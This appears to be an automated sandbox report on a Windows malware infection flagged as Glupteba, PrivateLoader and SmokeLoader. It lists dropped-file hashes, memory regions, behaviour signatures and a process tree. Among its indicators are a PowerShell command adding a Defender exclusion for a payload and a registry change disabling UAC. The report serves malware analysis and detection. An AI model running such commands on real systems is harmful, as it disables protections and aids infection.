C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe
| MD5 | 24a387fda6e0f36f9af44d65487c5f5b |
| SHA1 | a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970 |
| SHA256 | b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb |
| SHA512 | f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61 |
memory/1952-288-0x0000000002110000-0x0000000002800000-memory.dmp
memory/2508-299-0x0000000010000000-0x0000000010586000-memory.dmp
memory/2932-286-0x0000000074730000-0x0000000074E1E000-memory.dmp
\Users\Admin\Pictures\Opera_installer_2311212252533682736.dll
| MD5 | 161c755621aa80426d48315d27bc8daa |
| SHA1 | c17fed1e315395b38474842d3353663066b250c5 |
| SHA256 | 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b |
| SHA512 | 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf |
memory/2576-317-0x0000000000400000-0x0000000000965000-memory.dmp
memory/2736-319-0x0000000001120000-0x0000000001649000-memory.dmp
memory/1804-320-0x0000000002660000-0x0000000002A58000-memory.dmp
memory/1804-323-0x0000000002660000-0x0000000002A58000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0CZ65LQNOL9IJCX00PA6.temp
| MD5 | db2f22c972ce46ac1eb3603174feec78 |
| SHA1 | aeb530644d1ec485e6299ad2d2eff7d967d08526 |
| SHA256 | d69de755f56d7a5d6bbb2f2e3de54af151321566c3ecf860bd456d1b2ac96d76 |
| SHA512 | 9e171d0297f915aa0c7df57c855540afc1b8123cfa8eec8152ad62655bc5b81ecb170a3eb35ce366f0073731717cbe38a733cb471853bc0e4563351a071e2e09 |
memory/1804-327-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/1868-328-0x0000000000800000-0x0000000000900000-memory.dmp
memory/1868-329-0x0000000000220000-0x0000000000246000-memory.dmp
memory/1868-330-0x0000000000400000-0x0000000000639000-memory.dmp
memory/2932-331-0x000000000AF90000-0x000000000B4B9000-memory.dmp
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
| MD5 | d373ff7cb6ac28b844d9c90fc8f1ab3f |
| SHA1 | 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3 |
| SHA256 | 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b |
| SHA512 | f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1 |
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
| MD5 | d373ff7cb6ac28b844d9c90fc8f1ab3f |
| SHA1 | 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3 |
| SHA256 | 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b |
| SHA512 | f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1 |
memory/1804-334-0x0000000000400000-0x0000000000D1C000-memory.dmp
memory/540-336-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/540-338-0x00000000026B0000-0x0000000002730000-memory.dmp
memory/540-337-0x00000000026B0000-0x0000000002730000-memory.dmp
memory/1804-335-0x0000000002660000-0x0000000002A58000-memory.dmp
memory/1952-340-0x0000000002110000-0x0000000002800000-memory.dmp
memory/540-339-0x000000001B430000-0x000000001B712000-memory.dmp
memory/540-342-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
memory/2508-344-0x00000000011B0000-0x00000000018A0000-memory.dmp
memory/2508-343-0x00000000011B0000-0x00000000018A0000-memory.dmp
memory/2508-345-0x00000000011B0000-0x00000000018A0000-memory.dmp
memory/540-341-0x0000000002220000-0x0000000002228000-memory.dmp
memory/540-347-0x00000000026B0000-0x0000000002730000-memory.dmp
memory/540-351-0x00000000026B0000-0x0000000002730000-memory.dmp
memory/2508-350-0x0000000000250000-0x0000000000940000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e00a39f9f6799448a06281b1e170209c |
| SHA1 | 46e197530cd7214a11ffd3269e9030cb156e31a9 |
| SHA256 | 6f1f1dbdcb5dc75cd8a0cf3b615729609f836e8f75a5b6b5d1efc4b6ce412b96 |
| SHA512 | 52cf64762be713666945657650d07b5853825b073b1770873f421ec2500a8258f71c49939d87361220414be374b5fc98dfcb081bfcbd26139ae08a72e6748795 |
\??\c:\users\admin\pictures\otynkca5mm9jshidchcmeovk.exe
| MD5 | cde358332e1c8373e0946480461c2632 |
| SHA1 | 63863558ed8cb5e5287bee7f4441457eb8a72fc0 |
| SHA256 | 4c210af24e23fc945da65700e2934898576c31e8a04212032d776dc7ba830844 |
| SHA512 | 273db936d683e525d1e4c01d6bd64c24de6bca0113d5e4342c0432282c181a733ddf6640151d3aab96864ca182d08b992b28be250d532c589fd219264a5b94cd |
memory/540-362-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | db2f22c972ce46ac1eb3603174feec78 |
| SHA1 | aeb530644d1ec485e6299ad2d2eff7d967d08526 |
| SHA256 | d69de755f56d7a5d6bbb2f2e3de54af151321566c3ecf860bd456d1b2ac96d76 |
| SHA512 | 9e171d0297f915aa0c7df57c855540afc1b8123cfa8eec8152ad62655bc5b81ecb170a3eb35ce366f0073731717cbe38a733cb471853bc0e4563351a071e2e09 |
memory/2660-424-0x000000013F810000-0x000000013FDB1000-memory.dmp
memory/2764-425-0x000000001B1C0000-0x000000001B4A2000-memory.dmp
memory/2764-427-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp
memory/2764-430-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp
memory/2764-432-0x0000000002500000-0x0000000002580000-memory.dmp
memory/2764-440-0x0000000002500000-0x0000000002580000-memory.dmp
memory/2764-439-0x0000000002500000-0x0000000002580000-memory.dmp
memory/1868-431-0x0000000000400000-0x0000000000639000-memory.dmp
memory/2764-451-0x000007FEF47B0000-0x000007FEF514D000-memory.dmp
memory/2764-426-0x00000000021F0000-0x00000000021F8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NHNN7G0A1QIALH6JSOQK.temp
| MD5 | 81bfb6712c482635b537696c85a5e0a2 |
| SHA1 | 6adfd132e631b0aae06cdc47567226f7f1c7b4e2 |
| SHA256 | b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c |
| SHA512 | 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 81bfb6712c482635b537696c85a5e0a2 |
| SHA1 | 6adfd132e631b0aae06cdc47567226f7f1c7b4e2 |
| SHA256 | b996e7c6fca5ba243eba7376faba2979e2fa656087c5af75d95b9094f9e1598c |
| SHA512 | 35df0c1faa569ceaaedca1b64f3eaeb53540c866a0dd7faa00b997be9a284d86fd7e8b644bc1641ae4a75d36cd39d5363c6b59acbdb844fe79324be5e7c00ba5 |
memory/2736-514-0x0000000001120000-0x0000000001649000-memory.dmp
memory/2660-527-0x000000013F810000-0x000000013FDB1000-memory.dmp
memory/1612-528-0x00000000026A0000-0x0000000002A98000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/1868-530-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/1524-578-0x0000000002840000-0x0000000002C38000-memory.dmp
memory/1868-589-0x0000000000400000-0x0000000000639000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 5c2be31ca24cfcf4a2c0170a04b370c2 |
| SHA1 | f914b9fae082aa2a557bfa41128195b15d2a9ea4 |
| SHA256 | 3aed316b26acbbf1dbc4c2c6367b6559dd1f49b8c125c3bbd37f7084d5a9a4f0 |
| SHA512 | de69c53a55f507cfd8383103d889b4fa0df03fb253a6493cf2e5887f5fb609bf1ee04eae73560bfe91605cd163fd8d49e74d4e982794bf6fcf33e3887620532d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe
| MD5 | 24a387fda6e0f36f9af44d65487c5f5b |
| SHA1 | a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970 |
| SHA256 | b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb |
| SHA512 | f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-21 22:51
Reported
2023-11-21 22:55
Platform
win10v2004-20231020-en
Max time kernel
64s
Max time network
158s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PrivateLoader
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4776 created 3192 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Explorer.EXE |
| PID 4776 created 3192 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\System32\Conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Windows\System32\Conhost.exe | N/A |
Detected executables Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1JzKRfgB0B6mlpDNhxRTMYH.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KeKNI0HBC3jTbaXu7F5P7HsG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CSV14BpysP5J7MQG4zJUEk8j.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qY671kJQ7AzPIoEelwuZgy8N.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LBxBdM1YkSZDVFCIrKdVFUoV.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIvrl8AYVkg08cvMP7IdS09k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H9PWKUBrzog8hpkvdpqSJkYl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1536 set thread context of 4444 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3808 set thread context of 2276 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\allnewumm.exe
"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Random.exe
"C:\Users\Admin\AppData\Local\Temp\Random.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
"C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe"
C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe
"C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe"
C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"
C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --silent --allusers=0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe" --version
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
